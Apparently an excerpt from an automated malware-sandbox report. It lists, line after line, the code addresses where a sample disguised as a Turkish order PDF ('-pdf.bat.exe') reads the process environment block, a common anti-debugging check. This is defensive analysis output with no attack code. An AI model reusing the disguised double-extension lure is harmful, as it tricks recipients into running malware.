Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3A3C0 mov eax, dword ptr fs:[00000030h] 4_2_32D3A3C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3A3C0 mov eax, dword ptr fs:[00000030h] 4_2_32D3A3C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3A3C0 mov eax, dword ptr fs:[00000030h] 4_2_32D3A3C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3A3C0 mov eax, dword ptr fs:[00000030h] 4_2_32D3A3C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3A3C0 mov eax, dword ptr fs:[00000030h] 4_2_32D3A3C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3A3C0 mov eax, dword ptr fs:[00000030h] 4_2_32D3A3C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D383C0 mov eax, dword ptr fs:[00000030h] 4_2_32D383C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D383C0 mov eax, dword ptr fs:[00000030h] 4_2_32D383C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D383C0 mov eax, dword ptr fs:[00000030h] 4_2_32D383C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D383C0 mov eax, dword ptr fs:[00000030h] 4_2_32D383C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E053FC mov eax, dword ptr fs:[00000030h] 4_2_32E053FC
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4E3F0 mov eax, dword ptr fs:[00000030h] 4_2_32D4E3F0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4E3F0 mov eax, dword ptr fs:[00000030h] 4_2_32D4E3F0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4E3F0 mov eax, dword ptr fs:[00000030h] 4_2_32D4E3F0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D663FF mov eax, dword ptr fs:[00000030h] 4_2_32D663FF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEF3E6 mov eax, dword ptr fs:[00000030h] 4_2_32DEF3E6
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D403E9 mov eax, dword ptr fs:[00000030h] 4_2_32D403E9
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D403E9 mov eax, dword ptr fs:[00000030h] 4_2_32D403E9
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D403E9 mov eax, dword ptr fs:[00000030h] 4_2_32D403E9
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D403E9 mov eax, dword ptr fs:[00000030h] 4_2_32D403E9
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D403E9 mov eax, dword ptr fs:[00000030h] 4_2_32D403E9
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D403E9 mov eax, dword ptr fs:[00000030h] 4_2_32D403E9
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D403E9 mov eax, dword ptr fs:[00000030h] 4_2_32D403E9
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D403E9 mov eax, dword ptr fs:[00000030h] 4_2_32D403E9
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D8739A mov eax, dword ptr fs:[00000030h] 4_2_32D8739A
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D8739A mov eax, dword ptr fs:[00000030h] 4_2_32D8739A
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D28397 mov eax, dword ptr fs:[00000030h] 4_2_32D28397
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D28397 mov eax, dword ptr fs:[00000030h] 4_2_32D28397
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D28397 mov eax, dword ptr fs:[00000030h] 4_2_32D28397
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2E388 mov eax, dword ptr fs:[00000030h] 4_2_32D2E388
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2E388 mov eax, dword ptr fs:[00000030h] 4_2_32D2E388
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2E388 mov eax, dword ptr fs:[00000030h] 4_2_32D2E388
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5438F mov eax, dword ptr fs:[00000030h] 4_2_32D5438F
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5438F mov eax, dword ptr fs:[00000030h] 4_2_32D5438F
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D533A5 mov eax, dword ptr fs:[00000030h] 4_2_32D533A5
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D633A0 mov eax, dword ptr fs:[00000030h] 4_2_32D633A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D633A0 mov eax, dword ptr fs:[00000030h] 4_2_32D633A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E0539D mov eax, dword ptr fs:[00000030h] 4_2_32E0539D
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D29353 mov eax, dword ptr fs:[00000030h] 4_2_32D29353
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D29353 mov eax, dword ptr fs:[00000030h] 4_2_32D29353
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB035C mov eax, dword ptr fs:[00000030h] 4_2_32DB035C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB035C mov eax, dword ptr fs:[00000030h] 4_2_32DB035C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB035C mov eax, dword ptr fs:[00000030h] 4_2_32DB035C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB035C mov ecx, dword ptr fs:[00000030h] 4_2_32DB035C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB035C mov eax, dword ptr fs:[00000030h] 4_2_32DB035C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB035C mov eax, dword ptr fs:[00000030h] 4_2_32DB035C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFA352 mov eax, dword ptr fs:[00000030h] 4_2_32DFA352
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h] 4_2_32DB2349
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h] 4_2_32DB2349
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h] 4_2_32DB2349
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h] 4_2_32DB2349
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h] 4_2_32DB2349
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h] 4_2_32DB2349
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h] 4_2_32DB2349
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h] 4_2_32DB2349
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h] 4_2_32DB2349
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h] 4_2_32DB2349
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h] 4_2_32DB2349
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h] 4_2_32DB2349
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h] 4_2_32DB2349
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h] 4_2_32DB2349
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h] 4_2_32DB2349
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2D34C mov eax, dword ptr fs:[00000030h] 4_2_32D2D34C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2D34C mov eax, dword ptr fs:[00000030h] 4_2_32D2D34C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E05341 mov eax, dword ptr fs:[00000030h] 4_2_32E05341
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DD437C mov eax, dword ptr fs:[00000030h] 4_2_32DD437C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D37370 mov eax, dword ptr fs:[00000030h] 4_2_32D37370
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D37370 mov eax, dword ptr fs:[00000030h] 4_2_32D37370
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D37370 mov eax, dword ptr fs:[00000030h] 4_2_32D37370
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEF367 mov eax, dword ptr fs:[00000030h] 4_2_32DEF367
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2C310 mov ecx, dword ptr fs:[00000030h] 4_2_32D2C310
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D50310 mov ecx, dword ptr fs:[00000030h] 4_2_32D50310
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB930B mov eax, dword ptr fs:[00000030h] 4_2_32DB930B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB930B mov eax, dword ptr fs:[00000030h] 4_2_32DB930B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB930B mov eax, dword ptr fs:[00000030h] 4_2_32DB930B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6A30B mov eax, dword ptr fs:[00000030h] 4_2_32D6A30B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6A30B mov eax, dword ptr fs:[00000030h] 4_2_32D6A30B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6A30B mov eax, dword ptr fs:[00000030h] 4_2_32D6A30B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D27330 mov eax, dword ptr fs:[00000030h] 4_2_32D27330
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF132D mov eax, dword ptr fs:[00000030h] 4_2_32DF132D
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF132D mov eax, dword ptr fs:[00000030h] 4_2_32DF132D
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5F32A mov eax, dword ptr fs:[00000030h] 4_2_32D5F32A
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB20DE mov eax, dword ptr fs:[00000030h] 4_2_32DB20DE
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D590DB mov eax, dword ptr fs:[00000030h] 4_2_32D590DB
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov ecx, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov ecx, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov ecx, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov ecx, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h] 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2C0F0 mov eax, dword ptr fs:[00000030h] 4_2_32D2C0F0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D720F0 mov ecx, dword ptr fs:[00000030h] 4_2_32D720F0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D550E4 mov eax, dword ptr fs:[00000030h] 4_2_32D550E4
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D550E4 mov ecx, dword ptr fs:[00000030h] 4_2_32D550E4
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2A0E3 mov ecx, dword ptr fs:[00000030h] 4_2_32D2A0E3
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E050D9 mov eax, dword ptr fs:[00000030h] 4_2_32E050D9
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D380E9 mov eax, dword ptr fs:[00000030h] 4_2_32D380E9
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D35096 mov eax, dword ptr fs:[00000030h] 4_2_32D35096
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5D090 mov eax, dword ptr fs:[00000030h] 4_2_32D5D090
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5D090 mov eax, dword ptr fs:[00000030h] 4_2_32D5D090
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6909C mov eax, dword ptr fs:[00000030h] 4_2_32D6909C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3208A mov eax, dword ptr fs:[00000030h] 4_2_32D3208A
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2D08D mov eax, dword ptr fs:[00000030h] 4_2_32D2D08D
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF60B8 mov eax, dword ptr fs:[00000030h] 4_2_32DF60B8
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF60B8 mov ecx, dword ptr fs:[00000030h] 4_2_32DF60B8
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E05060 mov eax, dword ptr fs:[00000030h] 4_2_32E05060
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D32050 mov eax, dword ptr fs:[00000030h] 4_2_32D32050
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DD705E mov ebx, dword ptr fs:[00000030h] 4_2_32DD705E
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DD705E mov eax, dword ptr fs:[00000030h] 4_2_32DD705E
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5B052 mov eax, dword ptr fs:[00000030h] 4_2_32D5B052
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h] 4_2_32D41070
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D41070 mov ecx, dword ptr fs:[00000030h] 4_2_32D41070
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h] 4_2_32D41070
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h] 4_2_32D41070
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h] 4_2_32D41070
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h] 4_2_32D41070
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h] 4_2_32D41070
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h] 4_2_32D41070
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h] 4_2_32D41070
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h] 4_2_32D41070
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h] 4_2_32D41070
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h] 4_2_32D41070
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h] 4_2_32D41070
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5C073 mov eax, dword ptr fs:[00000030h] 4_2_32D5C073
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4E016 mov eax, dword ptr fs:[00000030h] 4_2_32D4E016
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4E016 mov eax, dword ptr fs:[00000030h] 4_2_32D4E016
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4E016 mov eax, dword ptr fs:[00000030h] 4_2_32D4E016
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4E016 mov eax, dword ptr fs:[00000030h] 4_2_32D4E016
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF903E mov eax, dword ptr fs:[00000030h] 4_2_32DF903E
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF903E mov eax, dword ptr fs:[00000030h] 4_2_32DF903E
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF903E mov eax, dword ptr fs:[00000030h] 4_2_32DF903E
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF903E mov eax, dword ptr fs:[00000030h] 4_2_32DF903E
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2A020 mov eax, dword ptr fs:[00000030h] 4_2_32D2A020
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2C020 mov eax, dword ptr fs:[00000030h] 4_2_32D2C020
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E061E5 mov eax, dword ptr fs:[00000030h] 4_2_32E061E5
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6D1D0 mov eax, dword ptr fs:[00000030h] 4_2_32D6D1D0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6D1D0 mov ecx, dword ptr fs:[00000030h] 4_2_32D6D1D0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF61C3 mov eax, dword ptr fs:[00000030h] 4_2_32DF61C3
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF61C3 mov eax, dword ptr fs:[00000030h] 4_2_32DF61C3
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E051CB mov eax, dword ptr fs:[00000030h] 4_2_32E051CB
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D601F8 mov eax, dword ptr fs:[00000030h] 4_2_32D601F8
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h] 4_2_32D551EF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h] 4_2_32D551EF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h] 4_2_32D551EF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h] 4_2_32D551EF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h] 4_2_32D551EF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h] 4_2_32D551EF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h] 4_2_32D551EF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h] 4_2_32D551EF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h] 4_2_32D551EF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h] 4_2_32D551EF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h] 4_2_32D551EF
